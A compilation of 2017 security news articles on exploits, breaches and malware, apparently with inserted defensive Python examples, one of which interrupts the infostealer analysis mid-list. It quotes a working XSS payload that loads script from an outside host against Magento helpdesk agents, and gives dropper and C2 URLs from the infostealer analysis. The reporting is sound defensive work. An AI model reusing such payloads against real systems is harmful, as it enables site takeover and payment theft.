According to the official, Andrew Finch “came to the front door” and “one of our officers discharged his weapon,” killing the man, but he declined to explain why the officer opened fire.

To be clear, Andrew Finch was not a Call of Duty player and he was not linked to the two gamers.

The police are investigating the case to track the person who called them first reporting the fake emergency.

The recording of the call to 911 operators that prompted this tragedy can be heard at this link.

Swatting is a serious problem; a member of Congress has proposed legislation to combat this illegal practice.

Back in 2013, the popular expert Brian Krebs was the victim of a swatting attack, fortunately with a happy ending.


Samsung Android Browser is affected by a critical SOP bypass issue, a Metasploit exploit code is available
30.12.2017 securityaffairs Android

The browser app pre-installed on Samsung Android devices is affected by a critical SOP bypass issue, tracked as CVE-2017-17692.
The browser app pre-installed on Samsung Android devices is affected by a critical flaw, tracked as CVE-2017-17692, that could be exploited by an attacker to steal data from other browser tabs if the user visits an attacker-controlled site.

The SOP bypass issue in the Samsung Internet Browser was discovered by the security researcher Dhiraj Mishra.

The CVE-2017-17692 vulnerability is a Same Origin Policy (SOP) bypass issue that affects the Samsung Internet Browser version 5.4.02.3 and earlier.
The Same Origin Policy is one of the most important security mechanisms implemented in modern browsers; the basic idea behind the SOP is that JavaScript from one origin should not be able to access the properties of a page served from another origin.

A SOP bypass occurs when sitea.com is somehow able to access the properties of siteb.com, such as its cookies, location, responses, etc.

An attacker could copy the victim’s session cookie or hijack the session, and read and write webmail on the victim’s behalf.

Mishra developed a Metasploit module for the exploitation of the SOP bypass issue and reported the flaw to MITRE to have a CVE assigned.

Mishra also reported the flaw to Samsung, who acknowledged it and confirmed that “the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October.“

Here is the Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit,

“When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants,” reads a blog post published by researchers from security firm Rapid7.

“This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first.”

The experts from Rapid7 have also published a video PoC of the attack.


The online availability of the Metasploit exploit code poses a serious risk to Samsung Android users who are still using the old Android stock browser.


A Kernel Exploit for Sony PS4 Firmware 4.05 is available online
30.12.2017 securityaffairs Exploit

The developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.
Good news for PlayStation gamers, the developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.

PS4 gamers who are running a firmware version lower than 4.05 need to update their console to 4.05 in order to trigger the exploit.

The Kernel exploit was released two months after Team Fail0verflow revealed the technical details about the first PS4 Kernel Exploit.

The kernel exploit ‘namedobj’ is now available on Github, it works for the PlayStation 4 on 4.05FW and allows users to run arbitrary code on the device.

“In this project you will find a full implementation of the “namedobj” kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.” reads the description published on GitHub.


The availability of the kernel exploit could allow developers to write a working jailbreak and kernel-level modifications to the system.

Jailbreaking allows removing hardware restrictions implemented by the operating system, it allows users to run custom code on the console and install mods, games, and third-party applications bypassing the anti-piracy mechanisms implemented by Sony.

“This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew,” SpecterDev said.

“This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.”

Reading the “Notes” section, we can see that the developer warns that the exploit may not work for some users.

“This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I’ve built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads,” SpecterDev warned.

At this point, experts at Sony will work to identify the flaws triggered by the kernel exploit and fix them.


Pavel Lerner, head of EXMO cryptocurrency exchange, was kidnapped in Ukraine
30.12.2017 securityaffairs Cyber

According to Ukrainian media, the head of the EXMO cryptocurrency exchange, Pavel Lerner, has been kidnapped in Kiev; the police are investigating the case.
According to Ukrainian media, the Russian IT expert Pavel Lerner has been kidnapped in Kiev.

Pavel Lerner (40) is the managing director of EXMO, one of the largest cryptocurrency exchanges, and according to the Ukrainian outlet Strana.ua he stopped responding to phone calls on December 26.

“According to the applicant in the case, Lerner was abducted near his workplace – an office center in Stepan Bandery Street (before renaming – Moscow Avenue). The programmer was dragged into the car of Mercedes-Benz Vito brand (state number AA 2063 MT) by unknown persons in dark clothes and balaclava, and taken away to an unknown destination.” states the Strana.ua.

Lerner has been kidnapped while he was leaving his office in Stepan Bandera Prospect in Kiev.

The IT specialist led a number of startups, related to blockchain technology and cryptocurrency mining.

Ukrainian police are investigating the case; at the time of writing it is still unclear who kidnapped the man, and why.

EXMO confirmed the news of the kidnapping and clarified that company operations were not affected by what has happened. EXMO also added that Lerner did not have direct access to any cryptocurrency account or other personal data.

“We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated,” PR-department of EXMO said.

“Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe.”


The Twitter account of the popular security expert John McAfee was hacked
30.12.2017 securityaffairs Social

The official Twitter account of popular cyber security expert John McAfee was hacked today, hackers used it to promote alternative cryptocurrencies.
The official Twitter account of legendary security expert John McAfee was hacked today, attackers used it to send several tweets promoting alternative cryptocurrencies like Siacoin, NXT, XRP, PTOY, and BAT.

At the time of writing, there is no further information about the attack; John McAfee explained that his account was protected with two-factor authentication.

This suggests that the attackers found a way to obtain the authentication code sent by Twitter; this is possible by compromising the mobile device or via an SS7 attack.

In this latter scenario, hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.

The principal instant messaging services, including WhatsApp and Telegram, rely on SMS authentication as the primary security verification mechanism, and SMS is routed through SS7 signalling. This means that hackers can exploit SS7 to compromise the verification mechanism, take over the victim’s account and impersonate him.

According to McAfee, someone has compromised his smartphone.

Adam Eivy (@antic), replying to @officialmcafee, Dec 28, 2017:
"So how did it happen? Was this a breach of twitter, of your 2-factor service (e.g. phone provider). Did you not have 2-factor on for some reason? Curious if this is something that could affect others."

John McAfee (@officialmcafee), 4:40 AM - Dec 28, 2017:
"If it can affect me it can affect anyone. Most likely my phone was compromised"

John McAfee (@officialmcafee), 12:04 AM - Dec 28, 2017:
"Urgent: My account was hacked. Twitter has been notified. The coin of the day tweet was not me. As you all know... I am not doing a coin of the day anymore!!!!"

“The first indication that I had been hacked was turning on my cell phone and seeing the attached image,” he told BBC.


McAfee added that he was on a boat when his account was hacked and for this reason he was not able to contact AT&T.
“I knew at that point that my phone had been compromised,” he added.

“I was on a boat at the time and could not go to my carrier (AT&T) to have the issue corrected.

“All that the hacker did was compromise my Twitter account. It could have been worse.”

John knows very well that he is a prime target for several types of attackers, including haters.

John McAfee (@officialmcafee), 4:32 AM - Dec 28, 2017:
"Though I am a security expert, I have no control over Twitter's security. I have haters. I am a target. People make fake accounts, fake screenshots, fake claims. I am a target for hackers who lost money and blame me. Please take responsibility for yourselves. Adults only please."

McAfee’s account has been fully restored; Twitter hasn’t commented on the incident.
The reality is that it is not hard for a persistent attacker to compromise a social media account.


Hackers are attempting to breach Magento stores through the Mirasvit Helpdesk extension
30.12.2017 securityaffairs Hacking

The cybersecurity expert Willem de Groot reported cyber attacks against Magento websites running the popular helpdesk extension ‘Mirasvit Helpdesk.’
De Groot observed attackers sending a message like this to Magento merchants:

Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com

The message contains a specially crafted sender that triggers an XSS attack.

“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”

<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com
“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.

The attack exploits one of the flaws discovered in September 2017 by researchers at the security firm WebShield, which affected all versions of the Mirasvit Helpdesk extension up to 1.5.2. The company addressed the issue with the release of version 1.5.3.

When a helpdesk agent opens the ticket, the XSS payload runs in the background in the agent’s browser, and malicious code is then added to the footer of the Magento template. In this way, the attacker gets his code executed on every page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payment data and send it offshore as the customer types it into the payment form.

“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.

“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”


De Groot suggested running the following query on the database to find XSS attempts:

SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G

and searching the access logs for modifications of templates through the backend:

$ grep system_config/save/section/design access.log
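The same two checks replayed in Python, as an added example that is not de Groot's code: the query's three conditions applied to exported ticket rows, and the grep turned into structured hits from an Apache-style access log. The ticket rows, log lines, the placeholder domain evil.example and the admin path are all constructed for this example.

```python
"""Added example (not de Groot's code): his SQL query and grep, replayed in Python.

It applies the same three conditions as the m_helpdesk_message query to
exported ticket rows and extracts structured hits for backend template
saves from an Apache-style access log. All sample data is constructed.
"""
import re

# Constructed rows in the shape of Mirasvit's m_helpdesk_message table.
# Row 2 mimics the injected sender seen in the campaign, with a placeholder
# domain (evil.example) instead of the real one.
SAMPLE_MESSAGES = [
    {"id": 1, "customer_email": "alice@example.com", "customer_name": "Alice",
     "body": "Order never arrived, please help."},
    {"id": 2,
     "customer_email": '<script src="https://evil.example/jquery.js"></script>@gmail.com',
     "customer_name": "Designer",
     "body": "Hey, I strongly recommend you to make a redesign!"},
    {"id": 3, "customer_email": "bob@example.com",
     "customer_name": "<SCRIPT>alert(1)</SCRIPT>", "body": "hi"},
    {"id": 4, "customer_email": "scriptwriter@example.com", "customer_name": "Carol",
     "body": "My prescription arrived late."},
]

# Constructed Apache combined-format lines; only the first is an admin
# design-config save of the kind de Groot's grep looks for (the third is a
# harmless "edit" view of the same section, which the grep rightly ignores).
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [28/Dec/2017:10:12:01 +0000] "POST /index.php/admin/system_config/save/section/design/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Dec/2017:10:15:44 +0000] "GET /checkout/onepage/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Dec/2017:10:16:02 +0000] "GET /index.php/admin/system_config/edit/section/design/ HTTP/1.1" 200 8810 "-" "Mozilla/5.0"',
]

TEMPLATE_SAVE_NEEDLE = "system_config/save/section/design"

# Minimal parser for the leading fields of an Apache combined log line.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_message(row):
    """Return 'script_tag', 'substring' or None for one ticket row.

    Mirrors the query's conditions, which MySQL evaluates case-insensitively:
      customer_email LIKE '%script%'
      OR customer_name LIKE '%<script%'
      OR body LIKE '%<script%'
    A literal '<script' anywhere is the clear signal; a bare 'script' in the
    e-mail alone is the broad check that also catches legitimate addresses,
    so it is reported separately for manual review.
    """
    email = (row.get("customer_email") or "").lower()
    name = (row.get("customer_name") or "").lower()
    body = (row.get("body") or "").lower()
    if "<script" in email or "<script" in name or "<script" in body:
        return "script_tag"
    if "script" in email:
        return "substring"
    return None


def find_suspicious_messages(rows):
    """(id, verdict) for every row the SQL query would return, in table order."""
    hits = []
    for row in rows:
        verdict = classify_message(row)
        if verdict is not None:
            hits.append((row["id"], verdict))
    return hits


def find_template_saves(log_lines, needle=TEMPLATE_SAVE_NEEDLE):
    """Equivalent of `grep system_config/save/section/design access.log`.

    Returns one dict per matching line with the client IP, timestamp, method,
    path and status, so the saves can be cross-checked against the IPs and
    times of legitimate admin sessions.
    """
    hits = []
    for line in log_lines:
        if needle not in line:
            continue
        m = _LOG_RE.match(line)
        if m is None:
            hits.append({"raw": line})  # unparseable line: keep it, do not drop it
            continue
        hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                     "path": m["path"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for ticket_id, verdict in find_suspicious_messages(SAMPLE_MESSAGES):
        print(f"ticket {ticket_id}: {verdict}")
    for hit in find_template_saves(SAMPLE_ACCESS_LOG):
        print("template save:", hit)
```

Run against a real export, a "substring" verdict is only a lead, while any "script_tag" hit or a template save from an unexpected IP warrants checking the template footer for injected code.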

The expert also published a copy of the malware on GitHub.

Mirasvit published a blog post warning its customers and urging them to update their installs.


Ancestry.com Responds Well To RootsWeb Data Breach
30.12.2017 securityaffairs Incident

The popular expert Troy Hunt notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”.
When you think of personal security questions, you might think of your mother’s surname or other family information that normally isn’t shared — unless you are building your family tree with an online genealogy search. When Ancestry.com notifies its users of a potential security breach it sounds worse than most.

Ancestry.com is a company with millions of customers that use their online tools to research their family tree. The company also hosts servers for RootsWeb, a free, community-driven collection of genealogy tools and discussion forums. On December 20th, 2017, Troy Hunt, of HaveIBeenPwned.com, notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”, and a quick and detailed investigation ensued.

website%20Ancestry.com

According to Ancestry.com’s blog post detailing the incident, the security team reviewed the file identified by Hunt, and determined that it does contain login details for 300,000 accounts although they describe, “the majority of the information was old.” They continued their investigation and determined that of the 300,000 accounts, 55,000 had been reused by users on both the RootsWeb and Ancestry websites. Most of the 55,000 were “from free trial, or currently unused accounts,” but 7,000 login credentials were in use by active Ancestry.com users. Ancestry.com supports millions of users so this breach represents less than 1% of their users, however, they still took the potential impacts seriously and acted accordingly.

The internal investigation points to the RootsWeb surname list information service which Ancestry.com retired earlier this year. “We believe the intrusion was limited to the RootsWeb surname list, where someone was able to create the file of older RootsWeb usernames and passwords as a direct result of how part of this open community was set up, an issue we are working to rectify”, according to the blog post by Ancestry.com CISO, Tony Blackman.

He continued with, “We have no reason to believe that any Ancestry systems were compromised. Further, we have not seen any activity indicating the compromise of any individual Ancestry accounts.” According to Ancestry, the RootsWeb servers do not host any credit card or social insurance numbers so the potential impact of this breach appears to be minimized.

The RootsWeb website is currently offline while the Ancestry teams complete their investigation, make the appropriate configuration changes and “ensure all data is saved and preserved to the best of [their] ability.”

In addition, Ancestry has locked the 55,000 accounts found in the exposed file, requiring users to change their passwords the next time they attempt to log on. It sent emails to all 55,000 email addresses advising them of the incident and recommended actions, and committed to “working with regulators and law enforcement where appropriate.”

To summarize, the Ancestry.com security team responded quickly when notified of a potential breach, determined the potential scope and impact, took swift action to minimize damages, notified impacted users, and clearly and publicly described the event. Troy Hunt’s tweet describes it best: “Another data breach from years ago, this time from @Ancestry’s services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they’ve handled it in an exemplary fashion.”

Troy Hunt (@troyhunt):
"Another data breach from years ago, this time from one of @Ancestry's services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they've handled it in an exemplary fashion https://blogs.ancestry.com/ancestry/2017/12/23/rootsweb-security-update/"


Two Romanians charged with infecting US Capital Police cameras with ransomware early this year
30.12.2017 securityaffairs Ransomware

Two Romanian people have been arrested and charged with hacking into US Capital Police cameras ahead of the inauguration of President Trump.
Two Romanian people have been arrested and charged with hacking into control systems of the surveillance cameras for the Metropolitan Police Department in the US. The two suspects, Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28, hacked the US Capital Police cameras earlier this year.

Ransomware infected 70 percent of the storage devices used by the Washington DC CCTV systems just eight days before the inauguration of President Donald Trump.

The attack occurred between 12 and 15 January; the ransomware infected 123 of 187 network video recorders, each controlling up to four CCTVs. IT staff were forced to wipe the infected systems in order to restore service; fortunately, the ransomware did not affect other components of the Washington DC network.


The first infections were discovered by the D.C. police on Jan. 12, when the authorities noticed that four camera sites were not functioning properly. Experts at the city technology office detected two distinct ransomware families (Cerber and Dharma) on four recording devices; they then extended the analysis to the entire surveillance network and wiped all infected equipment.

The duo was arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

According to an affidavit dated December 11, the two criminals acted in an effort “to extort money” in exchange for unlocking the surveillance system.

Prosecutors collected evidence that revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.

“The investigation uncovered information that the MPD surveillance camera computers were compromised between Jan. 9 and Jan. 12, 2017, and that ransomware variants called “cerber” and “dharma” had been stored on the computers. Other evidence in the investigation revealed a scheme to distribute ransomware by email to at least 179,000 email addresses. ” reads the press release published by the DoJ.

Isvanca remains in custody in Romania and Cismaru is under house arrest pending further legal proceedings; the maximum penalty for conspiracy to commit wire fraud is 20 years in prison.


Info Stealing – The cyber security expert Marco Ramilli spotted a new operation in the wild
30.12.2017 securityaffairs Cyber

The Italian cyber security expert Marco Ramilli, founder of Yoroi, published an interesting analysis of a fairly new InfoStealer malware delivered by email to many international companies.
Attack attribution is always very hard work. False flags, code reuse and spaghetti code make it impossible to assert “This attack belongs to X”. Indeed, nowadays it makes more sense to talk about attribution probability rather than attribution itself. “This attack belongs to X with 65% attribution probability” would be a correct sentence.
I made this quick introduction because the following analysis would probably lead the reader to think about a specific attribution, but it won’t be that accurate, so please be prepared not to get such clear conclusions.

Today I’d like to show an interesting analysis of a fairly new InfoStealer malware delivered by email to many international companies. The analysis shows interesting code reuse, apparently originating from Japanese attackers reusing an English-speaking attacker’s source code. Again, I do not have enough artifacts to give attribution, only a few clues, as follows. In the described analysis, the original sample was delivered by sarah@labaire.co.za (with high probability a compromised South African account) to one of my spam-trap email addresses.

The obtained sample is a Microsoft Word document with a macro in it. The macro was heavily obfuscated using four rounds of substitutions and UTF-8 encoded charsets (which, by the way, is super annoying). The following image shows the obfuscated macro code with UTF-8 charsets.
[Image] Stage 1: Obfuscation
By using oletools and “tons” of cups of coffee (to stay awake until late at night to work through the recursive steps) I was finally able to extract the invoked command, shown in the following image.
[Image] Stage 1: Invoked Command
A fashionable PowerShell command drops and executes hxxp://ssrdevelopments.co.za/a2/off.exe. PowerShell seems to be a “must have” in contemporary malware. Analyzing the “dropping” URL and tracking down how long it has been in “Index Of” mode (2017-0-13), I suspect it is not a compromised website but rather a purpose-built web server, or a compromised host of a dead company.

[Image] Dropping Web Site
By browsing the malware propagator’s website I found many malicious executables (see the IoC section), each one showing specific behaviors such as password stealers, RATs and banking Trojans. Even if the samples were developed for different targets, all of them shared the following basic behaviors:

Check the victim’s IP address before starting malicious activities (maybe related to targeted activities)
Install itself into an auto-execution path
Try to fingerprint the target system (CPU, HD, memory, username, system, etc.)
Sniff for keystrokes
I’d like to write a simple analysis for each sample found, but today time is not my friend, so let’s focus on one of the malicious samples. Let’s work through the received sample by digging into the “second stage” dropped by the PowerShell “first stage” from ssrdevelopments.co.za/a2/off.exe. After a few seconds on the second stage (off.exe) it became clear that it was a .NET program. By reversing the interpreted .NET code, some clear-text comments appeared interesting: Japanese-language comments and variable names came out of the static analysis. Let’s have a look at them.

[Image] Stage 2: Apparently Japanese characters
While the sample pretends to be compiled by “Coca-Cola Enterprise” (maybe a targeted operation against Coca-Cola? Or a targeted operation against Coca-Cola suppliers? So why did it end up in my inbox? Anyway …), Google Translate suggests that the Japanese characters are in the text, such as the “Entry Point”, class names and function names.
[Image] Stage 2: Japanese Names and Self Encoding Structures
It was not hard to figure out that Stage 2 was extracting bytes from itself (local variables) and saving them back to the hard drive after having set up an auto-execution key in the Windows registry. The following image shows the XOR function used to decrypt the converted bytes into the real payload.
[Image] Stage 2: XOR function to extract Stage 3
On my run, the XORed payload took the name GIL.exe, another .NET executable. We are now facing the third stage. By analyzing the decompiled sample it became clear that:
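The Stage 2 behaviour described above (the next stage kept as XOR-encoded bytes and written back to disk) is something an analyst usually short-circuits by brute-forcing the key instead of reversing the decoder. The following Python is an added example, not code from Marco Ramilli’s analysis or from the sample itself: it scans a carrier blob for a single-byte-XORed PE by searching for the encoded “MZ” magic and confirming the DOS stub text, and the carrier it runs on is constructed.

```python
"""Recover a single-byte-XOR-encoded PE payload embedded in a carrier file.

Added example (not the sample's own decoder): instead of reversing the XOR
routine, brute-force the key and accept the candidate whose decoded bytes
look like a Windows executable. The carrier built below is constructed.
"""
from typing import Optional, Tuple

MZ_MAGIC = b"MZ"
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"
PROBE_LEN = 0x200  # how many decoded bytes to inspect at each candidate offset


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; encoding and decoding are the same op."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE heuristic: MZ magic at offset 0 and the DOS stub string soon after."""
    return blob[:2] == MZ_MAGIC and DOS_STUB_TEXT in blob[:PROBE_LEN]


def find_embedded_pe(container: bytes) -> Optional[Tuple[int, int]]:
    """Return (offset, key) of the first XOR-encoded PE inside container, or None.

    For each of the 256 keys, XOR the expected "MZ" magic to get its encoded
    form, search the container for that two-byte pattern, and confirm each hit
    by decoding PROBE_LEN bytes and checking for the DOS stub. Key 0 is tried
    too, so a plain (unencoded) embedded PE is reported as well.
    """
    for key in range(256):
        needle = xor_bytes(MZ_MAGIC, key)
        start = 0
        while (off := container.find(needle, start)) != -1:
            if looks_like_pe(xor_bytes(container[off:off + PROBE_LEN], key)):
                return off, key
            start = off + 1  # false hit (e.g. "ER" in junk XORs to "MZ" for key 0x08)
    return None


def extract_embedded_pe(container: bytes) -> Optional[bytes]:
    """Decode and return the embedded PE (from its MZ header to the end of the carrier)."""
    hit = find_embedded_pe(container)
    if hit is None:
        return None
    off, key = hit
    return xor_bytes(container[off:], key)


def build_constructed_carrier(key: int = 0x5A) -> bytes:
    """Build a fake carrier: junk prefix, then a PE-shaped blob XORed with key.

    The blob is only shaped well enough for the heuristic above (MZ magic,
    a classic DOS stub, a PE signature); it is not a valid executable.
    """
    fake_pe = (
        MZ_MAGIC
        + b"\x90\x00" * 29                                             # pad DOS header to 0x3C
        + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"  # DOS stub code
        + DOS_STUB_TEXT + b".\r\r\n$"
        + b"\x00" * 32
        + b"PE\x00\x00\x4c\x01"                                        # PE signature, i386
        + b"\x00" * 200
    )
    return b"JUNK HEADER " * 8 + xor_bytes(fake_pe, key) + b"\x00" * 16


if __name__ == "__main__":
    carrier = build_constructed_carrier()
    hit = find_embedded_pe(carrier)
    print("embedded PE at offset %d, XOR key 0x%02x" % hit if hit else "nothing found")
```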

The coding style was quite different from the previous stage (Stage 2)
The implementation style was different from the previous stage as well
The sample was interested in information about the user, the machine, the web services on the PC and many more Windows-specific parameters.
[Image] Stage 3: New Language in Strings and Class names

[Image] Stage 3: New Code Style
By closely investigating Stage 3, the analyst would probably notice the heavy presence of “decorators”, a different format in the definition style and, last but not least, the core composition. Everything looks like it belongs to different individual developers. The variable language, the comment structure and the general usage of terms lead the analyst to believe they have found two different developers belonging to different cultures (maybe countries). Finally, the malware looks for user, computer and web service information and drops everything to the C2 by posting parameters to ssrdevelopments.co.za/cgi-bin/
IoC:
The principal IoCs for the described threat follow.
Hash Stage 1:
7f1860673de9b1c2e6f7d6963a499e8ba4e412a1
bf4a26c9e52a8cacc7afd7d95d197bff1e47fb00
Hash Stage 2:
ac55ee783f3ed0bd23eccd01040a128dc6dc7851
Hash Stage 3:
6a38e4acd9ade0d85697d10683ec84fa0daed11c
Persistence: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\kij %APPDATA%\Roaming\kij\kij.exe
Dropping URL:
ssrdevelopments.co.za
Command and Control:
ssrdevelopments.co.za/cgi-bin/
Related hashes from harvesting Dropping URL:
As a final thought I’d like to highlight the following key concepts of this analysis:

From a single email, the analyst can discover the attacker’s assets, map them and disarm them (through IoCs).
The analyzed code shows apparent evidence of belonging to different groups of attackers.
The analyzed samples show code reuse. Code reuse is dangerous because it makes attackers more powerful and extremely quick to change malware behavior.
Hope you enjoyed.

The original post was published by Marco Ramilli on his blog at the following URL:

https://marcoramilli.blogspot.it/2017/12/info-stealing-new-operation-in-wild.html


Huawei router exploit (CVE-2017-17215) involved in Satori and Brickerbot was leaked online
30.12.2017 securityaffairs
Exploit

The exploit code used to trigger the CVE-2017-17215 vulnerability in Huawei routers over the past several weeks is now publicly available.
Before Christmas, the Mirai botnet made the headlines once again: a new variant dubbed Satori was responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

The activity of the Satori botnet has been observed over the past month by researchers from Check Point.

Satori is an updated variant of the notorious Mirai botnet, which was first spotted by the malware research group MalwareMustDie in August 2016. The malicious code was developed to target IoT devices; the Satori version targets port 37215 on Huawei HG532 devices.

The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.


Experts observed that the attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router, which stems from the fact that the TR-064 technical report standard, designed for local network configuration, was exposed to the WAN through port 37215 (UPnP, Universal Plug and Play).

News of the day is that the code used to target the Huawei routers over the past several weeks is now publicly available.

The discovery was made by Ankit Anubhav, a researcher at security firm NewSky.

Anubhav first discovered the code on Pastebin.com early this week.

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” states a blog post published by Anubhav.

The exploit code for CVE-2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk: it could become a commodity in the criminal underground, and vxers could use it to build their own botnets.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code: earlier in December, the author of the Brickerbot botnet, who goes online by the moniker “Janitor”, released a dump which contained snippets of Brickerbot source code.

NewSky Security, analyzing the code, discovered the usage of the CVE-2017–17215 exploit code; this means that the code had been available in the underground for a long time.

“Let us compare this with a binary of Satori botnet (in the image below). Not only do we see the same attack vector i.e. code injection in <NewStatusURL>, but also we witness the other indicator, the “echo HUAWEIUPNP“ string, implying that both Satori and Brickerbot had copied the exploit source code from the same source.” continues NewSky.


This is not the first time that IoT botnets have leveraged issues related to the SOAP protocol. Earlier this year, security experts observed several Mirai-based botnets using two other SOAP bugs (CVE-2014–8361 and TR-64), which are code injections in <NewInternalClient> and <NewNTPServer> respectively.

Back to the present: Huawei provided a list of mitigation actions for this latest wave of attacks, which includes configuring the router’s built-in firewall, changing the default password, or using a firewall on the carrier side.

I have not provided the link to the code published on Pastebin, but it is very easy to find with the proper query.
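For a defender looking at captures or web-server logs from TCP/37215, the injection points named above (NewStatusURL for CVE-2017-17215, NewInternalClient and NewNTPServer for the older SOAP bugs) are easy to screen: a legitimate value in those fields is a URL, hostname or IP address, so shell metacharacters, or the “HUAWEIUPNP” marker string NewSky found in both botnets, are out of place. The following Python is an added example, not NewSky’s, Check Point’s or Huawei’s code; the SOAP envelope and the request bodies it runs on are constructed and do not reproduce the device’s real schema.

```python
"""Triage TR-064/UPnP SOAP request bodies for the injection pattern behind
CVE-2017-17215 (and the older NewInternalClient / NewNTPServer bugs).

Added example, not vendor or researcher code. Input is the HTTP request body
as seen on TCP/37215; output is one Finding per suspicious field. The
envelope and sample bodies below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Elements the article identifies as the injection points (namespace ignored).
WATCHED_FIELDS = {"NewStatusURL", "NewInternalClient", "NewNTPServer"}

# None of these belong in a URL, hostname or IP address. A single '&' is
# allowed because it is legitimate in a URL query string.
SHELL_META = re.compile(r"[;|`$(){}<>\n]|&&")

# Marker string NewSky reported in both botnets' copies of the exploit.
KNOWN_MARKER = "HUAWEIUPNP"

# Raw fallback for envelopes the XML parser rejects (an attacker may send
# deliberately broken XML that a lenient device-side parser still accepts).
RAW_FIELD = re.compile(r"<(New\w+)>(.*?)</\1>", re.S)


@dataclass
class Finding:
    field: str
    value: str
    reason: str


def classify_value(field: str, value: str) -> Optional[str]:
    """Return why a field value is suspicious, or None if it looks legitimate."""
    if KNOWN_MARKER in value:
        return "known exploit marker string"
    if SHELL_META.search(value):
        return "shell metacharacters in a URL/host field"
    return None


def _local_name(tag: str) -> str:
    """'{urn:...}NewStatusURL' -> 'NewStatusURL'."""
    return tag.rsplit("}", 1)[-1]


def inspect_soap_body(body: str) -> List[Finding]:
    """Inspect one HTTP request body; return a Finding per suspicious watched field."""
    try:
        root = ET.fromstring(body)
        pairs = [(_local_name(el.tag), (el.text or "").strip()) for el in root.iter()]
    except ET.ParseError:
        pairs = [(m.group(1), m.group(2).strip()) for m in RAW_FIELD.finditer(body)]
    findings: List[Finding] = []
    for field, value in pairs:
        if field in WATCHED_FIELDS:
            reason = classify_value(field, value)
            if reason:
                findings.append(Finding(field, value, reason))
    return findings


def triage(bodies: List[str]) -> List[List[Finding]]:
    """Run inspect_soap_body over a batch of captured bodies, keeping input order."""
    return [inspect_soap_body(b) for b in bodies]


# Constructed sample bodies (generic envelope, hypothetical action/service names).
BENIGN_BODY = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body><u:SetConfig xmlns:u="urn:example:tr064-service">
    <NewStatusURL>http://192.0.2.10/status?id=7</NewStatusURL>
    <NewNTPServer>pool.ntp.org</NewNTPServer>
  </u:SetConfig></s:Body>
</s:Envelope>"""

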